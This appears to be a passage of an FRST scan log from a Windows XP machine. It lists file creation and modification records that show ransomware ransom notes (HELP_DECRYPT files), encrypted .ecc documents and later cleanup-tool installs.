2015-03-05 19:29 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\Administrator\Local Settings\HELP_DECRYPT.URL
2015-03-05 19:29 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_DECRYPT.URL
2015-03-05 19:29 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\Administrator\HELP_DECRYPT.URL
2015-03-05 19:29 - 2013-07-07 17:50 - 00001599 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Remote Assistance.lnk
2015-03-05 19:13 - 2015-03-05 19:18 - 00000285 _____ () C:\Documents and Settings\Maureen\Desktop\DCOM Policy Edit.txt
2015-03-05 11:25 - 2015-03-07 18:58 - 00100906 _____ () C:\WINDOWS\WindowsUpdate.log
2015-03-05 11:25 - 2015-03-07 02:22 - 00038782 _____ () C:\WINDOWS\setupapi.log
2015-03-05 11:24 - 2015-03-05 11:24 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware
2015-03-05 11:09 - 2015-03-05 11:09 - 00000682 _____ () C:\Documents and Settings\All Users\Desktop\CCleaner.lnk
2015-03-05 11:09 - 2015-03-05 11:09 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\CCleaner
2015-03-05 11:08 - 2015-03-05 11:09 - 00000000 ____D () C:\Program Files\CCleaner
2015-03-05 09:28 - 2015-03-07 19:01 - 00000680 _____ () C:\WINDOWS\Tasks\Windows Updates.job
2015-03-03 18:15 - 2015-03-03 18:15 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\McAfee
2015-02-26 18:17 - 2015-02-27 00:55 - 02359350 _____ () C:\Documents and Settings\Maureen\My Documents\!Decrypt-All-Files-fuarzfg.bmp
2015-02-26 18:17 - 2015-02-27 00:54 - 00001266 _____ () C:\Documents and Settings\Maureen\My Documents\!Decrypt-All-Files-fuarzfg.txt
2015-02-26 18:07 - 2015-02-26 18:07 - 00008604 _____ () C:\HELP_DECRYPT.HTML
2015-02-26 18:07 - 2015-02-26 18:07 - 00004242 _____ () C:\HELP_DECRYPT.TXT
2015-02-26 18:07 - 2015-02-26 18:07 - 00000288 _____ () C:\HELP_DECRYPT.URL
2015-02-26 15:16 - 2015-02-26 18:17 - 01804189 _____ () C:\Documents and Settings\All Users\Application Data\aqclain.html
2015-02-26 14:34 - 2015-02-26 14:34 - 00001806 _____ () C:\Documents and Settings\All Users\Desktop\System Mechanic Professional.lnk
2015-02-26 01:32 - 2015-02-26 08:23 - 00000000 ___HD () C:\Documents and Settings\Maureen\Application Data\DC3EEDD7
2015-02-25 19:34 - 2015-02-25 19:34 - 00008604 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.HTML
2015-02-25 19:34 - 2015-02-25 19:34 - 00008604 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.HTML
2015-02-25 19:34 - 2015-02-25 19:34 - 00008604 _____ () C:\Documents and Settings\Maureen\My Documents\HELP_DECRYPT.HTML
2015-02-25 19:34 - 2015-02-25 19:34 - 00008604 _____ () C:\Documents and Settings\Maureen\HELP_DECRYPT.HTML
2015-02-25 19:34 - 2015-02-25 19:34 - 00008604 _____ () C:\Documents and Settings\HELP_DECRYPT.HTML
2015-02-25 19:34 - 2015-02-25 19:34 - 00000288 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.URL
2015-02-25 19:34 - 2015-02-25 19:34 - 00000288 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.URL
2015-02-25 19:34 - 2015-02-25 19:34 - 00000288 _____ () C:\Documents and Settings\Maureen\My Documents\HELP_DECRYPT.URL
2015-02-25 19:34 - 2015-02-25 19:34 - 00000288 _____ () C:\Documents and Settings\Maureen\HELP_DECRYPT.URL
2015-02-25 19:34 - 2015-02-25 19:34 - 00000288 _____ () C:\Documents and Settings\HELP_DECRYPT.URL
2015-02-25 19:19 - 2015-02-25 19:19 - 00008604 _____ () C:\Documents and Settings\Maureen\Local Settings\HELP_DECRYPT.HTML
2015-02-25 19:19 - 2015-02-25 19:19 - 00008604 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-25 19:19 - 2015-02-25 19:19 - 00000288 _____ () C:\Documents and Settings\Maureen\Local Settings\HELP_DECRYPT.URL
2015-02-25 19:19 - 2015-02-25 19:19 - 00000288 _____ () C:\Documents and Settings\Maureen\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-25 14:59 - 2015-02-25 14:59 - 00008604 _____ () C:\Documents and Settings\Maureen\Application Data\HELP_DECRYPT.HTML
2015-02-25 14:59 - 2015-02-25 14:59 - 00000288 _____ () C:\Documents and Settings\Maureen\Application Data\HELP_DECRYPT.URL
2015-02-25 14:58 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.HTML
2015-02-25 14:58 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-25 14:58 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.HTML
2015-02-25 14:58 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.HTML
2015-02-25 14:58 - 2015-02-25 14:58 - 00008604 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.HTML
2015-02-25 14:58 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\Default User\Local Settings\HELP_DECRYPT.URL
2015-02-25 14:58 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-25 14:58 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\Default User\HELP_DECRYPT.URL
2015-02-25 14:58 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\All Users\HELP_DECRYPT.URL
2015-02-25 14:58 - 2015-02-25 14:58 - 00000288 _____ () C:\Documents and Settings\All Users\Application Data\HELP_DECRYPT.URL
2015-02-25 13:57 - 2015-02-26 08:23 - 66112650 _____ () C:\Documents and Settings\Maureen\Application Data\log.html
2015-02-25 13:57 - 2015-02-25 13:57 - 00000636 _____ () C:\Documents and Settings\Maureen\Application Data\key.dat
2015-02-25 13:37 - 2015-02-25 13:37 - 00000000 ____D () C:\Documents and Settings\Maureen\Local Settings\Application Data\Macromedia
2015-02-25 13:13 - 2015-03-07 18:56 - 00000000 ___HD () C:\Documents and Settings\All Users\Application Data\{72CDD0F3-C5DC-44BD-9A3E-9B7A11C6D8F9}

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-03-07 18:57 - 2013-07-07 13:45 - 00000159 _____ () C:\WINDOWS\wiadebug.log
2015-03-07 18:57 - 2013-07-07 13:45 - 00000048 _____ () C:\WINDOWS\wiaservc.log
2015-03-07 18:57 - 2008-04-13 18:00 - 00002206 _____ () C:\WINDOWS\system32\wpa.dbl
2015-03-07 18:56 - 2014-12-29 12:24 - 00000882 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-03-07 18:56 - 2014-03-30 13:51 - 00000226 _____ () C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job
2015-03-07 18:56 - 2013-07-07 17:53 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2015-03-07 18:55 - 2014-12-08 08:44 - 00589824 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2015-03-07 18:55 - 2014-04-14 16:40 - 01048576 _____ () C:\WINDOWS\system32\config\iolo App.evt
2015-03-07 18:55 - 2013-07-07 17:53 - 00032570 _____ () C:\WINDOWS\SchedLgU.Txt
2015-03-07 18:55 - 2013-07-07 17:53 - 00000178 ___SH () C:\Documents and Settings\Maureen\ntuser.ini
2015-03-07 18:51 - 2013-07-07 17:53 - 00000000 __SHD () C:\Documents and Settings\LocalService
2015-03-07 18:41 - 2008-04-13 18:00 - 00000227 _____ () C:\WINDOWS\system.ini
2015-03-07 17:34 - 2014-12-29 12:24 - 00000886 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-03-07 17:29 - 2013-07-07 17:50 - 00000000 ____D () C:\DELL
2015-03-07 16:36 - 2014-09-10 15:36 - 00000374 _____ () C:\WINDOWS\Tasks\At3.job
2015-03-07 14:30 - 2014-09-10 15:36 - 00000374 _____ () C:\WINDOWS\Tasks\At4.job
2015-03-07 10:15 - 2014-09-10 15:36 - 00000374 _____ () C:\WINDOWS\Tasks\At1.job
2015-03-07 05:11 - 2014-12-05 12:29 - 00000664 _____ () C:\WINDOWS\system32\d3d9caps.dat
2015-03-07 03:44 - 2014-12-29 08:53 - 00035992 _____ () C:\WINDOWS\system32\Drivers\hitmanpro37.sys
2015-03-07 03:42 - 2014-07-05 12:10 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\HitmanPro
2015-03-06 20:45 - 2014-09-10 15:36 - 00000374 _____ () C:\WINDOWS\Tasks\At2.job
2015-03-06 19:47 - 2014-04-14 16:40 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\iolo
2015-03-06 19:41 - 2013-07-07 13:41 - 00000327 ___SH () C:\boot.ini
2015-03-06 19:41 - 2008-04-13 18:00 - 00000931 _____ () C:\WINDOWS\win.ini
2015-03-06 19:23 - 2013-11-26 14:37 - 00000000 ____D () C:\WINDOWS\Minidump
2015-03-06 00:03 - 2013-07-07 13:37 - 00000000 ____D () C:\WINDOWS\security
2015-03-05 22:52 - 2013-07-07 17:53 - 00000000 __SHD () C:\Documents and Settings\NetworkService
2015-03-05 22:19 - 2013-07-07 17:48 - 00000000 ____D () C:\WINDOWS\system32\Restore
2015-03-05 22:17 - 2013-07-07 13:42 - 00262144 _____ () C:\WINDOWS\system32\config\SECURITY.bak
2015-03-05 22:17 - 2013-07-07 13:42 - 00028672 _____ () C:\WINDOWS\system32\config\SAM.bak
2015-03-05 22:17 - 2013-07-07 13:41 - 28049408 _____ () C:\WINDOWS\system32\config\software.bak
2015-03-05 22:17 - 2013-07-07 13:41 - 10747904 _____ () C:\WINDOWS\system32\config\system.bak
2015-03-05 22:17 - 2013-07-07 13:41 - 00667648 _____ () C:\WINDOWS\system32\config\default.bak
2015-03-05 18:36 - 2014-12-06 13:35 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\YuveHogu
2015-03-05 08:38 - 2014-12-29 12:25 - 00001813 _____ () C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk
2015-03-01 22:15 - 2013-07-07 19:22 - 00000000 ____D () C:\Shop Shared
2015-03-01 21:43 - 2013-07-07 18:11 - 00000000 ____D () C:\Shared Files
2015-02-27 09:51 - 2014-04-15 10:03 - 00000000 ____D () C:\WINDOWS\system32\config\SM Registry Backup
2015-02-27 08:27 - 2014-04-14 16:40 - 00000000 ____D () C:\Documents and Settings\Maureen\Application Data\iolo
2015-02-26 18:09 - 2013-07-07 19:26 - 00000000 ____D () C:\Documents and Settings\Maureen\email
2015-02-26 15:59 - 2013-11-10 17:18 - 00000000 ____D () C:\Logitech Alert Recordings
2015-02-26 15:02 - 2013-07-07 18:09 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Windows Genuine Advantage
2015-02-26 14:34 - 2014-04-14 16:55 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\System Mechanic Professional
2015-02-26 14:33 - 2013-07-07 13:37 - 00000000 ____D () C:\WINDOWS\Media
2015-02-26 08:15 - 2013-07-10 14:26 - 00000000 ____D () C:\Program Files\Quantum Project Manager
2015-02-26 08:15 - 2013-07-07 17:48 - 00000000 ____D () C:\Program Files\Outlook Express
2015-02-26 08:14 - 2013-07-10 14:46 - 00000000 ____D () C:\Program Files\Microsoft Works
2015-02-26 07:53 - 2014-07-26 07:30 - 00000000 ____D () C:\Documents and Settings\Maureen\My Documents\Old house Web
2015-02-26 07:53 - 2014-02-10 13:41 - 00034516 _____ () C:\Documents and Settings\Maureen\My Documents\Warwick Zoning-2nd Notice of Violation 2-2014.pdf.ecc
2015-02-26 07:51 - 2014-08-20 11:31 - 00064740 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140820123125.pdf.ecc
2015-02-26 07:51 - 2014-08-19 10:48 - 00047988 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140819114815.pdf.ecc
2015-02-26 07:51 - 2014-08-19 08:42 - 00027124 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140819094206.pdf.ecc
2015-02-26 07:51 - 2014-08-19 06:20 - 00004852 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140819072017.pdf.ecc
2015-02-26 07:51 - 2014-08-15 13:26 - 00074516 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140815142604.pdf.ecc
2015-02-26 07:51 - 2014-08-14 11:05 - 00142228 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140814120545.pdf.ecc
2015-02-26 07:51 - 2014-08-13 14:40 - 00034052 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140813154055.pdf.ecc
2015-02-26 07:51 - 2014-08-07 10:46 - 00065732 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140807114653.pdf.ecc
2015-02-26 07:51 - 2014-08-05 09:33 - 00065796 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140805103338.pdf.ecc
2015-02-26 07:51 - 2014-08-01 12:42 - 00088740 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140801134257.pdf.ecc
2015-02-26 07:51 - 2014-08-01 08:01 - 00030612 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140801090112.pdf.ecc
2015-02-26 07:51 - 2014-08-01 07:59 - 00023748 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140801085953.pdf.ecc
2015-02-26 07:51 - 2014-07-22 08:58 - 00031972 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140722095858.pdf.ecc
2015-02-26 07:51 - 2014-07-21 10:05 - 00036980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140721110504.pdf.ecc
2015-02-26 07:51 - 2014-07-18 13:03 - 00031348 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140718140346.pdf.ecc
2015-02-26 07:51 - 2014-07-18 12:46 - 00031956 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140718134619.pdf.ecc
2015-02-26 07:51 - 2014-07-18 07:32 - 00022980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140718083214.pdf.ecc
2015-02-26 07:51 - 2014-07-17 14:32 - 00050420 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140717153259.pdf.ecc
2015-02-26 07:51 - 2014-07-14 11:48 - 00012036 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140714124837.pdf.ecc
2015-02-26 07:51 - 2014-07-14 10:28 - 00094308 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140714112815.pdf.ecc
2015-02-26 07:51 - 2014-07-10 11:00 - 00029956 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140710120056.pdf.ecc
2015-02-26 07:51 - 2014-07-10 09:25 - 00053956 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140710102549.pdf.ecc
2015-02-26 07:51 - 2014-07-02 10:36 - 00126628 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140702113611.pdf.ecc
2015-02-26 07:51 - 2014-07-01 08:36 - 00182516 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701093646.pdf.ecc
2015-02-26 07:51 - 2014-07-01 08:31 - 00312612 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701093103.pdf.ecc
2015-02-26 07:51 - 2014-07-01 08:27 - 00185444 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701092734.pdf.ecc
2015-02-26 07:51 - 2014-07-01 08:24 - 00095684 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701092447.pdf.ecc
2015-02-26 07:51 - 2014-07-01 08:22 - 00104692 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701092237.pdf.ecc
2015-02-26 07:51 - 2014-07-01 08:19 - 00061796 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701091949.pdf.ecc
2015-02-26 07:51 - 2014-07-01 08:15 - 00140484 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701091538.pdf.ecc
2015-02-26 07:51 - 2014-07-01 08:14 - 00217268 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701091408.pdf.ecc
2015-02-26 07:51 - 2014-07-01 08:10 - 00288756 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701091046.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:56 - 00140644 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701085631.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:51 - 00152980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701085144.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:47 - 00149540 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701084720.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:39 - 00114644 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701083926.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:33 - 00047716 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701083308.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:31 - 00055748 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701083139.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:30 - 00066420 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701083001.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:27 - 00094484 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701082734.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:24 - 00076708 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701082451.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:22 - 00076244 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701082255.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:21 - 00024868 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701082149.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:20 - 00077924 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701082003.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:18 - 00100740 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701081823.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:16 - 00096948 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701081629.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:15 - 00042148 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701081505.pdf.ecc
2015-02-26 07:51 - 2014-07-01 07:13 - 00060804 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140701081318.pdf.ecc
2015-02-26 07:51 - 2014-06-26 09:58 - 00217604 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140626105851.pdf.ecc
2015-02-26 07:51 - 2014-06-21 07:21 - 00349268 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140621082052_1.jpg.ecc
2015-02-26 07:51 - 2014-06-21 07:18 - 00123620 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140621081824.pdf.ecc
2015-02-26 07:51 - 2014-06-21 07:17 - 00132100 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140621081709.pdf.ecc
2015-02-26 07:51 - 2014-06-16 09:27 - 00051876 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140616102702.pdf.ecc
2015-02-26 07:51 - 2014-06-13 07:58 - 00068196 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140613085834.pdf.ecc
2015-02-26 07:51 - 2014-06-12 10:08 - 00235092 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140612110825.pdf.ecc
2015-02-26 07:51 - 2014-06-12 10:06 - 00180980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140612110631.pdf.ecc
2015-02-26 07:51 - 2014-06-12 09:54 - 00074900 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140612105432.pdf.ecc
2015-02-26 07:51 - 2014-06-10 11:16 - 00086980 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140610121658.pdf.ecc
2015-02-26 07:51 - 2014-06-10 11:00 - 00087316 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140610120022.pdf.ecc
2015-02-26 07:51 - 2014-06-09 12:07 - 00020836 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140609130750.pdf.ecc
2015-02-26 07:51 - 2014-06-04 07:39 - 00034420 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140604083945.pdf.ecc
2015-02-26 07:51 - 2014-05-21 14:55 - 00269332 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140521155518.pdf.ecc
2015-02-26 07:51 - 2014-05-21 14:41 - 00219876 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140521154149.pdf.ecc
2015-02-26 07:51 - 2014-05-21 14:40 - 00048644 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140521154024.pdf.ecc
2015-02-26 07:51 - 2014-05-21 14:38 - 00117652 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140521153851.pdf.ecc
2015-02-26 07:51 - 2014-05-20 12:44 - 00074388 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140520134451.pdf.ecc
2015-02-26 07:51 - 2014-05-12 10:37 - 00065716 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140512113735.pdf.ecc
2015-02-26 07:51 - 2014-05-12 10:36 - 00087844 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140512113639.pdf.ecc
2015-02-26 07:51 - 2014-05-09 09:06 - 00086708 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140509100620.pdf.ecc
2015-02-26 07:51 - 2014-05-02 11:15 - 00005652 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140502121504.pdf.ecc
2015-02-26 07:51 - 2014-04-23 07:41 - 00023172 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140423084132.pdf.ecc
2015-02-26 07:51 - 2014-04-22 12:35 - 00054644 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140422133522.pdf.ecc
2015-02-26 07:51 - 2014-04-17 12:04 - 00062212 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140417130433.pdf.ecc
2015-02-26 07:51 - 2014-04-17 10:34 - 00034404 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140417113412.pdf.ecc
2015-02-26 07:51 - 2014-04-14 11:26 - 00138708 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140414122608.pdf.ecc
2015-02-26 07:51 - 2014-04-11 12:52 - 00014548 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140411135214.pdf.ecc
2015-02-26 07:51 - 2014-04-10 08:01 - 00067412 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140410090127.pdf.ecc
2015-02-26 07:51 - 2014-04-08 14:24 - 00033060 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140408152429.pdf.ecc
2015-02-26 07:51 - 2014-04-07 07:55 - 00039220 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140407085512.pdf.ecc
2015-02-26 07:51 - 2014-04-03 11:10 - 00132868 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140403121031.pdf.ecc
2015-02-26 07:51 - 2014-04-03 09:10 - 00064180 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140403101014.pdf.ecc
2015-02-26 07:51 - 2014-04-02 15:57 - 00188516 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140402165733.pdf.ecc
2015-02-26 07:51 - 2014-04-01 09:46 - 00011268 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140401104645.pdf.ecc
2015-02-26 07:51 - 2014-03-31 12:43 - 00047220 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140331134318.pdf.ecc
2015-02-26 07:51 - 2014-03-28 11:29 - 00007828 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140328122924.pdf.ecc
2015-02-26 07:51 - 2014-03-28 11:22 - 00039092 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140328122240.pdf.ecc
2015-02-26 07:51 - 2014-03-28 10:58 - 00084420 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140328115814.pdf.ecc
2015-02-26 07:51 - 2014-03-17 12:48 - 00062052 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140317134833.pdf.ecc
2015-02-26 07:51 - 2014-03-17 07:52 - 00047188 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140317085237.pdf.ecc
2015-02-26 07:51 - 2014-03-06 10:11 - 00019220 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140306101156.pdf.ecc
2015-02-26 07:51 - 2014-03-06 10:09 - 00060804 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140306100940.pdf.ecc
2015-02-26 07:51 - 2014-02-26 10:28 - 00025588 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140226102803.pdf.ecc
2015-02-26 07:51 - 2014-02-26 10:24 - 00024340 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140226102440.pdf.ecc
2015-02-26 07:51 - 2014-02-25 08:35 - 00160724 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140225083520.pdf.ecc
2015-02-26 07:51 - 2014-02-24 13:43 - 00026388 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140224134349.pdf.ecc
2015-02-26 07:51 - 2014-02-23 09:38 - 00057796 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140223093820.pdf.ecc
2015-02-26 07:51 - 2014-02-20 09:34 - 00106532 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140220093401.pdf.ecc
2015-02-26 07:51 - 2014-02-20 08:55 - 00177748 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140220085507.pdf.ecc
2015-02-26 07:51 - 2014-02-14 10:59 - 00015060 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140214105952.pdf.ecc
2015-02-26 07:51 - 2014-02-14 10:57 - 00013780 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140214105732.pdf.ecc
2015-02-26 07:51 - 2014-02-14 10:56 - 00012852 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140214105618.pdf.ecc
2015-02-26 07:51 - 2014-02-10 15:48 - 00018564 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140210154813.pdf.ecc
2015-02-26 07:51 - 2014-02-10 15:44 - 00085620 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140210154430.pdf.ecc
2015-02-26 07:51 - 2014-02-10 15:40 - 00037572 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140210154045.pdf.ecc
2015-02-26 07:51 - 2014-02-10 13:55 - 00032164 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140210135519.pdf.ecc
2015-02-26 07:51 - 2014-02-10 13:38 - 00030244 _____ () C:\Documents and Settings\Maureen\My Documents\Dell Laser MFP 1600n_20140210133824.pdf.ecc
